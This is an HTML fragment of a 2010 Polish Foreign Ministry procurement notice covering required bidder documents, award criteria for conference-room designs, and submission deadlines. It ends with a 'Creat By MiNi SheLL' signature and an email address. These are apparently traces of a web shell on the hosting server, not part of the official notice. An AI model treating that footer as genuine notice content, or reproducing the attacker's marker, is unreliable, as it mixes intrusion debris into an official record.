<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Projekty trzech głównych sal konferencyjnych wraz z finalną ścianą - 40</li>
<li>3 - Projekt ściany informacyjnej (planu) - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl, zakładka Aktualności, zakładka zamówienia publiczne Zarząd Obsługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi MSZ
     00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2010 godzina 11:00, miejsce: Dzienni Podawczy MSZ
     00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com